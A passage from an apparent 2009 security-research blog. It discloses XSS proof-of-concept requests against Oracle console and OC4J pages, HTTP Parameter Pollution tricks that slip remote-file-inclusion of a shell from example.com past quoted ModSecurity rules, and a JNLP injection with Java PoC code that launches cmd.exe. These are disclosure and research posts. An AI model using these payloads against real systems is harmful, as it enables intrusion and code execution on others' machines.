      /console/faces/com_sun_web_ui/help/helpwindow.jsp
      Parameters: windowTitle, helpFile, pageTitle, mastheadUrl, mastheadDescription, jspPath

      /console/faces/com_sun_web_ui/help/masthead.jsp
      Parameters: mastheadUrl, pageTitle

      PoC example: https://IP:PORT/console/faces/com_sun_web_ui/help/helpwindow.jsp?&windowTitle=&helpFile=%22%3E%3C/FRAMESET%3E%3CFRAME%20SRC=%22javascript:alert(%27XSS%27);%22%3E%3C!--


      (B) In case of OC4J, the problem is triggered with malformed requests containing invalid HTTP methods.
      G<script>alert(123);</script>ET /servlet/ HTTP/1.1
      Host: 127.0.0.1:5500


      501 Not Implemented
      Method G<script>alert(123);</script>ET is not defined in RFC 2068 and is not supported by the Servlet API
      Versions 10.1.3.4.0 and likely all the 10.x releases are not vulnerable.
      Oracle support for the J2EE application container 9.x ended in December 2008, according to Oracle's Lifetime Support Policy. However, they still provide this insecure software here. From my experience, I've seen several installations of such outdated and unsupported software within corporations. As you can easily imagine, it means no patch... sad indeed.
      Tags: ikki xss owasp

      June 17 2009

      14:05

      HPP and WAF

      HTTP Parameter Pollution used as a WAFs bypass technique seems to be a very favored topic. Just a few updates regarding this matter...

      Lavakumar Kuppan has released his paper as well as a security advisory on how to bypass the mod_security core rules in order to exploit SQL injections in ASP/ASP.NET environments. It is worth mentioning that installations using ModSecurity <= 2.5.9 with ModSecurity Core Rules <= 2.5-1.6.1 are vulnerable, so you may want to check your systems.

      A new whitepaper titled "Detecting remote file inclusion attacks" was released by Breach Security. It discusses a generic rule set intended to protect applications from RFI attacks. Once again, the suggested RFI rule set is vulnerable to HPP bypass.

      Most of the suggested rules may be very useful for detecting generic RFI attacks, but they just do not work against HPP attacks in specific web frameworks.

      IP Address
      SecRule "ARGS" "@rx (ht|f)tps?://([\d\.]+)"
      "t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:'RFI'"

      Function INCLUDE
      SecRule "ARGS" "@rx \binclude\s*\([^)]*(ht|f)tps?://"
      "t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:'RFI'"

      Inclusion ends with question mark
      SecRule "ARGS" "@rx (ft|htt)ps?.*\?+$"
      "t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:'RFI'"

      In case of ASP and ASP.NET (and other HTTP back-ends), it is still possible to inject multiple HTTP parameters containing two segments of the attack:

      http://vulnerable_app/vulnerable_page?par=http://example.com/shell.txt&par=?

      Resulting in "http://example.com/shell.txt,?". Since the pseudo shell filename is managed by the attacker, he/she may easily create a file named "shell.txt,". The following attack bypasses the other two rules as well.

      Obviously, this is true for all web technologies that consider multiple occurrences and concatenate them using different characters. ASP and ASP.NET are the most interesting examples of such behavior. That said, I understand that the suggested solution may provide a workable level of security, especially considering that PHP does not concatenate multiple parameters.

      Besides WAF stuff, it is important to remember that HPP is also about server- and client-side flaws. Well, in case it's not clear enough, some vulnerabilities that we are going to disclose will hopefully help emphasize the concept.

      Luca
      Tags: ikki hpp

      May 31 2009

      09:04

      IT Underground and TomcatZOO

      Finally, it is my turn! I really enjoy the idea of sharing my thoughts here.

      Since NibbleSec is a multi-author blog, I'm not going to bore you with low-level stuff - Snagg is just enough!

      For fun (and profit) I'm usually involved in web application pentests and, lately, in Java security. It is kind of fun and, these days, it is usually the easiest way to get a shell.

      I'm just back from IT Underground Prague, where I gave a speech about Apache Tomcat security and TomcatZOO, one of the first NibbleSec projects. While waiting for the release of the tool, you may enjoy the presentation.

      Ikki
      Tags: ikki tomcat
      09:04

      Client side code execution via JNLP files

      As you may know, I'm a kind of Java enthusiast. This is especially true when a Java technology overlaps with web security.
      I was actually testing a piece of software based on Java Web Start when I realized how practical (and dangerous) this technology can be. The overall idea of Java Web Start is to deploy and execute standalone Java clients directly from the Internet using a web browser. Unlike Java Applets, Web Start applications do not have all the limitations enforced by the sandbox.

      Specifically, I was testing Eye of the Storm, a network management product composed of several server-side components as well as a nice Web Start application. A CGI program, /EOS/cgi/EYELauncher, generates personalized JNLP files so that Java Web Start can invoke a standalone Java application with the proper parameters and configuration.
      Besides other usual issues, I've discovered a way to trigger client-side code execution via a tampered JNLP file. Thinking about a real-world attack scenario, an aggressor could convince a user to follow a malicious link which abuses the online CGI in order to generate a malicious JNLP file. Since the CGI does not properly filter the input, it is possible to pollute the JNLP file content.

      A simple GET request, as the following
      http:///EOS/cgi/EYELauncher?%2d%2d%75%73%65%72%3d%61%61%61%3b%2d%2d%68%6f%73%74%3d%61%61%61%3b%2d%2d%68%74%74%70%50%72%6f%74%6f%63%6f%6c%3d%66%69%6c%65%3a%2f%2f%2f%43%3a%5c%5c%57%49%4e%4e%54%5c%5c%73%79%73%74%65%6d%33%32%5c%5c%63%6d%64%2e%65%78%65%3f
      will cause the inclusion of user-supplied parameters in com.entuity.eos.client.startup.EYELauncher.main(String args[]).

      In particular circumstances, the application may invoke the executeEYEClient(String, String, String, String, String) method, which can be used to exploit a vulnerable com.entuity.util.BrowserLauncher.openURL(String) method that executes the well-known Runtime.getRuntime().exec() call.
      The execution of the vulnerable method is triggered by an exception while the main method runs. EYELauncher handles this specific exception by requesting a new JNLP file from the server, using the insecure "openURL" call.

      To locally test the vulnerability, just use the following code:
      import com.entuity.eos.client.startup.EYELauncher;

      public class EOTS_poc1 {
          public static void main(String[] args) {
              String[] arguments = {"--user=aaa", "--host=aaa", "--httpProtocol=file:///C:\\WINNT\\system32\\cmd.exe?"};
              EYELauncher.main(arguments);
          }
      }
      Unfortunately, I was not able to find a reliable way to trigger the exception, thus the exploitability of this finding is likely low. However, at least in my humble opinion, it is a nice demonstration of one-click code execution.

      In addition to the usual stuff (XSS, ActiveX exploits and so on), let's not forget about Java Web Start as well.
      Tags: ikki java
      09:03

      HTTP Parameter Pollution FAQs

      We have received numerous public replies as well as several private emails.
      Thanks for your comments, suggestions and feedback.

      It's now time to summarize and clarify some points.

      Q: Is this a new class of exploits or just another case of applications lacking input validation?
      A: Actually, HPP is an input validation flaw. Like SQL Injection and XSS, we may consider it an injection weakness. In this specific case, query string delimiters are the "dangerous" characters.

      Q: You are saying that several HTTP back-ends manage multiple occurrences in different ways. In some cases, this may be abused in order to fingerprint the underlying back-end. Is that right?
      A: Yes, sure. However, considering the granularity available, we don't think it is really that interesting.

      Q: This is a known attack. You guys presented a bunch of interesting but already known techniques to exploit different vulnerabilities.
      A: Actually, we think we have contributed (in some way) to the current state of the art by exposing this issue. However, even if it is currently used by "hardcore" attackers, it's very important to formalize a threat in order to mitigate the issue and create efficient workarounds. The aim of the entire research is to raise awareness of this problem. In the future, we would like to include HPP within the OWASP Testing Guide in order to provide the right methodology for testing systems against HPP-like attacks as well. We strongly believe that sharing such knowledge may increase the security of all web applications.

      Q: Most of your examples and findings use GET parameters. What about POST?
      A: POST and COOKIE parameters may be affected as well. In slides #11 and #19, we briefly stated that, and you will see further research on it because it is a very interesting aspect: it gives additional flexibility to all attacks.

      Q: In the current version of IE8, is the XSS Filter still vulnerable to HPP?
      A: No! We had a discussion with the IE XSS Filter guy at Microsoft and it turns out that the current version is NOT affected. All previous tests were done against the beta release and we didn't double-check the latest one. We are sorry for this misunderstanding.

      Q: Are multiple occurrences of a parameter valid according to the RFC, W3C, whatever?
      A: Yes! Yes! The only thing which was in fact worth mentioning is the lack of a standard for the management of multiple occurrences, NOT the presence of multiple occurrences themselves. After all, that's why it is possible to abuse the query string delimiter injection flaw.

      Q: Is Yahoo! Mail still vulnerable to HPP?
      A: Difficult to say. However, the specific issue was patched thus it cannot be abused by malicious users.

      Q: Could you provide additional details regarding the Yahoo! Classic Mail HPP attack?
      A: We've just published HERE an in-depth review of the issue with the video PoC as well.

      Q: What's the right way of managing multiple occurrences? Is there a "perfect" framework?
      A: No, there are no right or wrong behaviors, and we cannot speak of right or wrong web servers/web frameworks either. The behavior of the HTTP back-end is a matter of exploitability only.

      Q: HPP is only about WAFs bypasses?
      A: Absolutely not! HPP is also about application flow manipulation, anti-CSRF bypasses and content pollution.

      Q: How can I prevent HPP?
      A: First of all, ask yourself "Which layer am I protecting?". Then, speaking about server-side HPP, it's always important to use URL encoding whenever you make GET/POST HTTP requests to an HTTP back-end. From the client-side point of view, use URL encoding whenever you are going to include user-supplied content within links, etc.
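
      For instance, a minimal client-side JavaScript illustration (userInput is a hypothetical user-supplied value):

      // Encode user-supplied values before concatenating them into a URL
      var link = '/redirect?continue_url=' + encodeURIComponent(userInput);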

      Q: Am I vulnerable to HPP?
      A: It depends on how you are managing multiple occurrences of the same parameter from the application's point of view. Using strict input validation checkpoints and the right output filtering (URL encoding), you are likely secure (at least against HPP).

      That's all, for now.

      Cheers,
      Luca
      Tags: ikki hpp
      08:58

      HTTP Parameter Pollution (HPP)

      As you know, on May 14th at OWASP AppSec Poland 2009, Stefano di Paola and I presented a new attack category called HTTP Parameter Pollution (HPP).

      HPP attacks can be defined as the possibility of overriding or adding HTTP GET/POST parameters by injecting query string delimiters. HPP affects a building block of all web technologies, thus both server-side and client-side attacks exist.
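
      To give a flavor of the issue with a purely illustrative example (parameter names and back-end behavior are hypothetical): suppose a front-end forwards requests to a back-end as /backend?action=view&uid=USER_INPUT. By submitting uid=123%26action%3Ddelete, the decoded query string becomes action=view&uid=123&action=delete, and a back-end that takes the last occurrence of a parameter will execute the injected action instead of the hardcoded one.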





      Exploiting HPP vulnerabilities, it may be possible to:
      • Override existing hardcoded HTTP parameters
      • Modify the application behaviors
      • Access and, potentially exploit, uncontrollable variables
      • Bypass input validation checkpoints and WAFs rules
      Just to whet your appetite, we can anticipate that, while researching real-world HPP vulnerabilities, we discovered issues in some Google Search Appliance front-end scripts, Ask.com, Yahoo! Mail Classic and several other products.

      You can download the slides of the talk here or browse it on Slideshare.

      Also, we'll release a whitepaper in order to clarify all the details about HPP.
      Finally, the video of the "Yahoo! Classic Mail" client-side HPP exploitation will be available soon on this blog. That's all for now.

      Cheers,
      Ikki
      Tags: ikki hpp owasp
      08:58

      Making OWASP AppSec 2009 virtual


      The most interesting Web App Security conference is here, in Krakow.
      OWASP AppSec 2009 is a great event, indeed. We're having fun, sharing ideas and trying to build the next generation of webapp security, all together. No flags, no commercial slogans.

      If you don't have the chance to attend the conference these days, you may join us virtually. Seba and the other guys have organized 360-degree coverage using blogs, Twitter, Flickr, ...

      In a few hours, together with Stefano di Paola, we are going to present our research on HTTP Parameter Pollution (HPP). As we like to say, HPP is a quite simple but effective hacking technique. It can be used to modify the behavior of client-side and server-side applications, to exploit vulnerabilities in uncontrollable variables and even to bypass web application firewalls. As you will see, it's a kind of unbelievable story. Further details and the slides will be published as soon as possible.

      Cheers,
      Luca
      Tags: ikki hpp owasp
      08:55

      3, 2, 1... In Mission

      Hello Internet,
      this is our first post, so stop wondering "who the hell are these NibbleSec guys".
      We'll start answering a couple of questions.

      • We're not a commercial entity

      • We're not a ub3r3l33t black-hat crew

      • We're not a new initiative the internet really does not need


      NibbleSec is just a label on a team of four friends who live in the Information Security world, and that's it.
      We're going to use this blog as a launchpad for some of our research, publishing tools and insights. There are plenty of similar blogs around the net, so here's our personal version.

      We have some nice things in the oven, so stay tuned because we're going to serve a couple of hot dishes in a while!

      Oh, we almost forgot this one: you might be interested in knowing who's behind NibbleSec.org!?
      No problem, here you are: BlackFire, Daath, Ikki and Snagg.

      See you soon in the next post!